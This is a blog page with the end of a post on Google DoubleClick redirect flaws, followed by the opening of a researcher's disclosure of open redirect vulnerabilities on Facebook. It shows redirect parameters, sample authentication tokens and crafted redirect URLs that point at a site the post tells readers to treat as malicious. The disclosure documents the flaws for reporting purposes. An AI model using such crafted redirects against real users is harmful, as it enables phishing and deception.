<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">These vulnerabilities were reported to Google earlier in 2014. But it seems that Google has yet taken any actions. All of the vulnerabilities are still not patched.</span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="line-height: 20.7900009155273px;">
<div style="line-height: 28px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Related Posts:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<a href="http://seclists.org/fulldisclosure/2014/Nov/28"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2014/Nov/28</span></a></div>
<a href="https://cxsecurity.com/issue/WLB-2014110106"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">https://cxsecurity.com/issue/WLB-2014110106</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1192">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1192</a></span><br />
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01307.html"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01307.html</span></a><br />
<a href="http://computerobsess.blogspot.com/2014/11/google-doubleclicknetadvertising-system.html"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2014/11/google-doubleclicknetadvertising-system.html</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="http://www.techenet.com/2014/12/doubleclick-do-google-pode-ser-vulneravel-a-ataques/">http://www.techenet.com/2014/12/doubleclick-do-google-pode-ser-vulneravel-a-ataques/</a></span><br />
<a href="https://computertechhut.wordpress.com/2014/11/12/google-doubleclick-spam/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://computertechhut.wordpress.com/2014/11/12/google-doubleclick-spam/</span></a><br />
<a href="http://mathpost.tumblr.com/post/120760828940/tetraph-google-doubleclick-net-advertising"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://mathpost.tumblr.com/post/120760828940/tetraph-google-doubleclick-net-advertising</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.com/security/open-redirect/google-doubleclick-netadvertising-system-url-redirection-vulnerabilities-can-be-used-by-spammers/" target="_blank">http://tetraph.com/security/<wbr></wbr>open-redirect/google-<wbr></wbr>doubleclick-netadvertising-<wbr></wbr>system</a></span><br />
<a href="https://www.facebook.com/essayjeans/posts/838922772865543"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/essayjeans/posts/838922772865543</span></a><br />
<a href="https://plus.google.com/u/0/+essayjeans/posts/Y12x6gXfyFX"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/+essayjeans/posts/Y12x6gXfyFX</span></a><br />
<a href="http://mathstopic.blogspot.com/2015/06/google-doubleclick-spam.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://mathstopic.blogspot.com/2015/06/google-doubleclick-spam.html</span></a><br />
<a href="http://itsecurity.lofter.com/post/1cfbf9e7_72fe79f"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://itsecurity.lofter.com/post/1cfbf9e7_72fe79f</span></a><br />
<a href="https://twitter.com/essayjeans/status/606726247578636288"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/essayjeans/status/606726247578636288</span></a><br />
<a href="http://tetraph.tumblr.com/post/120760676767/google-doubleclick-net-advertising-system-url"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.tumblr.com/post/120760676767/google-doubleclick-net-advertising-system-url</span></a><br />
<a href="https://itinfotechnology.wordpress.com/2014/11/18/google-doubleclick-spam/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itinfotechnology.wordpress.com/2014/11/18/google-doubleclick-spam/</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=945171075538075&id=874373602617823">https://www.facebook.com/permalink.php?story_fbid=945171075538075</a></span><br />
<a href="http://guyuzui.lofter.com/post/1ccdcda4_7305f25"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://guyuzui.lofter.com/post/1ccdcda4_7305f25</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.blog.163.com/blog/static/23460305120155534216326/">http://tetraph.blog.163.com/blog/static/23460305120155534216326/</a></span><br />
<a href="http://www.inzeed.com/kaleidoscope/spamming/google-doubleclick-spam/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/spamming/google-doubleclick-spam/</span></a><br />
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com1tag:blogger.com,1999:blog-827796800660023204.post-10113052826139841622015-06-04T21:55:00.000-07:002015-06-04T21:56:58.223-07:00Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A New Open Redirect Web Security Bugs<div style="background-color: white;">
<div>
<a href="http://4.bp.blogspot.com/-ByWUzVtJdRQ/VXEc20I6JpI/AAAAAAAAA-Q/RjJ4yZGoRj4/s1600/facebook_0.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="266" src="http://4.bp.blogspot.com/-ByWUzVtJdRQ/VXEc20I6JpI/AAAAAAAAA-Q/RjJ4yZGoRj4/s400/facebook_0.jpg" width="400" /></span></a><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;">Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A New Open Redirect Web Security Bugs</span></b><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>Domain:</b></span></div>
<div>
<a href="http://www.facebook.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"Facebook is an online social networking service headquartered in Menlo Park, California. Its website was launched on February 4, 2004, by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The founders had initially limited the website's membership to Harvard students, but later expanded it to colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities and later to high-school students. Since 2006, anyone who is at least 13 years old is allowed to become a registered user of the website, though the age requirement may be higher depending on applicable local laws. Its name comes from a colloquialism for the directory given to it by American universities students." (Wikipedia)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">"Facebook had over 1.44 billion monthly active users as of March 2015.Because of the large volume of data users submit to the service, Facebook has come under scrutiny for their privacy policies. Facebook, Inc. held its initial public offering in February 2012 and began selling stock to the public three months later, reaching an original peak market capitalization of $104 billion. As of February 2015 Facebook reached a market capitalization of $212 Billion." (Wikipedia)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b>Discover:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 17.8181819915772px; text-align: justify;">Wang Jing, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Singapore. (<a href="https://twitter.com/justqdjing/status/554206258413043713" target="_blank">@justqdjing</a>)</span></span></div>
<div>
<a href="http://www.tetraph.com/wangjing/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) General Vulnerabilities Description:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1)</b> <b>Two Facebook vulnerabilities are introduced in this article.</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Facebook has a computer cyber security bug problem. It can be exploited by Open Redirect attacks. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Since Facebook is trusted by large numbers of other websites. Those vulnerabilities can be used to do "Covert Redirect" to other websites such as Amazon, eBay, Go-daddy, Yahoo, 163, Mail.ru etc.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1.1)</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">One Facebook Open Redirect vulnerability was reported to Facebook. Facebook adopted a new mechanism to patch it. Though the reported URL redirection vulnerabilities are patched. However, all old generated URLs are still vulnerable to the attacks. Section (2) gives detail of it.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The reason may be related to Facebook's third-party interaction system or database management system or both. Another reason may be related to Facebook's design for different kind of browsers. </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1.2)</b> Another new Open Redirect vulnerability related to Facebook is introduced, too. For reference, please read section (3).</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on IE (9.0) of Windows 8, Firefox (24.0) & Google Chromium 30.0.1599.114 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (12.10),Safari 6.1.6 of Mac OS X Lion 10.7.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.2)</b> Facebook's URL Redirection System Related to "*.php" Files</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">All URLs' redirection are based on several files, such l.php, a.php, landing.php and so on. </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The main redirection are based on file "l.php" (Almost all redirection links are using it right now). </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">For file "l.php", one parameter "h" is used for authentication. When it mentions to file "a.php", parameter "eid" is used for authentication. All those two files use parameter "u" for the url redirected to. In some other files such as "landing.php", parameters such as "url", "next" are used.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><1>For parameter "h", two forms of authentication are used.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> <a>h=HAQHyinFq</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> <b>h=<wbr></wbr>hAQHalW1CAQHrkVIQNNqgwhxRWLNsF<wbr></wbr>VeH3auuImlbR1CgKA</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><2>For parameter "eid", one form of authentication is used.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> <a>eid=<wbr></wbr>AQLP8sRq6lbU0jz0lARx9A9uetB6FI<wbr></wbr>F1N2-Yjj_ePj0d_<wbr></wbr>ezubjstZeDo6qDsalKVJwy6uDb_hQ-<wbr></wbr>9tBsA2dVoQRq0lniOu0os_<wbr></wbr>gPe3gY5l8lYblhQSwBtdvgjXjNqaxL<wbr></wbr>ZMYoasr3vv46tFsh1fL7q4kjT2LFw5<wbr></wbr>2dnJWd4SE8qc0YuPWfgPeQywgM2wl0<wbr></wbr>CoW-<wbr></wbr>lftWkr2dX0dLcytyHjXnvhKfVS_<wbr></wbr>pQBllszUzsPENxE6EuZ-<wbr></wbr>53Lh188o56idnfyyk2L58pE7C94PF-<wbr></wbr>za4ZVB0qbuA2EnPcSJI-<wbr></wbr>7oIiIJmIhifHe0CYTzG512-Z_<wbr></wbr>heN44VlyJHevhS9auAR8-<wbr></wbr>lFCAIlYymnT_<wbr></wbr>Qiwp92RxjNOfBypBvszQUrvB6PH3fA<wbr></wbr>Nn1prfMBVm4RD_<wbr></wbr>GFel14KVDS5USswbTOTkL3sZNhHUqq<wbr></wbr>PHwBwU3JFePMMuwsfesigH85B_<wbr></wbr>AxCsXUIWN7klKGSq8bPPsKSHttsa9h<wbr></wbr>kkMpSfRKL7D_<wbr></wbr>xwW4dU2xlmfGWil7jYRJmwfbOeF0zu<wbr></wbr>jk1FRBuM757tbfFMav-J-<wbr></wbr>K9npbdrDrCuUVqV__Tf7CGZ89nPl-<wbr></wbr>M2d09pE9enJj0OBXOaSXZX16LKaYnv<wbr></wbr>1Wh4GKme7C-EOunITxyQtp1zy-<wbr></wbr>48Uaz9mxO2x4bw7sBDfzDStF_Al8_<wbr></wbr>0SMjWNTh-J38rBHAgT96X-<wbr></wbr>dPFI43HU3x3fVymE9szrclBpvTaSfY<wbr></wbr>ezatgMzf77s3lQrQAMSlwSSRIzRuoF<wbr></wbr>vQBmWKT0T5ZFgH5ykhYKhNMiKj577U<wbr></wbr>O5g2Ojm-_-KKF4N_DBuG5R-<wbr></wbr>I6EOSlhok2xUkpKVDnDcxZFTLxGmx5<wbr></wbr>xc56J5kZLjJ96wnF2fH09Q19Qc2aU3<wbr></wbr>xYFlEFrKjrlLpwGyOyCDx7_<wbr></wbr>z7y1O4Efqew3Fa0Cb9s6Kk2jpLF5XE<wbr></wbr>IaYzzXOLAffxXG6icBJVovb9RPmiZ5<wbr></wbr>s9dKYYotLol68_X04O05bEvVccPEh-<wbr></wbr>IQwX_<wbr></wbr>VTMt3f23be2MECEqR2l1A1ZkJx4qP0<wbr></wbr>0GI1pZhU_<wbr></wbr>CXAnjSaTNmtaINRUeSsLNEZZsPwpWJ<wbr></wbr>MfeeGSwuof9krC05eSWjO0jH9tua0K<wbr></wbr>teMYhj8i-<wbr></wbr>3dwSBp4f7nMcFwH5ltfCLhMCYNB8rx<wbr></wbr>gzcAczyhLIo2UY-<wbr></wbr>3FSaJXBZ0lvuZBvnj7myUnyc2lCcy-<wbr></wbr>fWh93MRRaJrrinjtfr9fDSMHM9Cja5<wbr></wbr>xi0eG3Vs0aClnWbeJZA79TvmYt7E53<wbr></wbr>HfwGuv5-EJOqRh3cwZF-<wbr></wbr>53uPHA73ikUk3xTApjQunJM4uIBhpy<wbr></wbr>7iBIgn_<wbr></wbr>OXXo3X03YUJtJcDuC20ocJbZ310VHl<wbr></wbr>iox5tYZF2oiMaOfgo9Y9KeqgsrJgwP<wbr></wbr>CJeif4aB0Ne4g_oM_<wbr></wbr>Tuqt2pXbdgoCawHIApF087eFKJqejp<wbr></wbr>0jpEkJerXPyK-IqsD_SQfIm_<wbr></wbr>2WJSkzwzATwQKs</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-uv4devrx3B8/VLIw_4BOG_I/AAAAAAAAAl4/9qRvuLAa1W4/s1600/facebook_developer.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://1.bp.blogspot.com/-uv4devrx3B8/VLIw_4BOG_I/AAAAAAAAAl4/9qRvuLAa1W4/s400/facebook_developer.png" width="400" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b><br /></b><b>(2) Vulnerability Description 1:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1)</b> A security researcher reported two Open Redirect vulnerabilities to Facebook in 2013. The following are the two links reported.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://www.facebook.com/l.php?u=http://www.bing.com&h=mAQHgtP_E" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http://www.bing.com&h=<wbr></wbr>mAQHgtP_E</span></a></div>
<div>
<a href="http://facebook.com/campaign/landing.php?url=http://www.adcash.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://facebook.com/campaign/<wbr></wbr>landing.php?url=http://www.<wbr></wbr>adcash.com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Though a new mechanism was adopted. However, all old generated redirections still work by parameter "h" and "eid". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2)</b> A website was used for the following tests. The website is "<a href="http://www.tetraph.com/" target="_blank">http://www.tetraph.com/</a>". Suppose this website is malicious.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2.1)</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><1>First test </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a>file: "l.php" </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL parameter: "u" </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><c>authentication parameter: "h" </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><d>form: "h=HAQHyinFq". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><e>The authentication has no relation with all other parameters, such as "s". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 1:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.aboutads.info%2F&h=lAQHmVMhS&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.aboutads.<wbr></wbr>info%2F&h=lAQHmVMhS&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=lAQHmVMhS&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=lAQHmVMhS&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
<div>
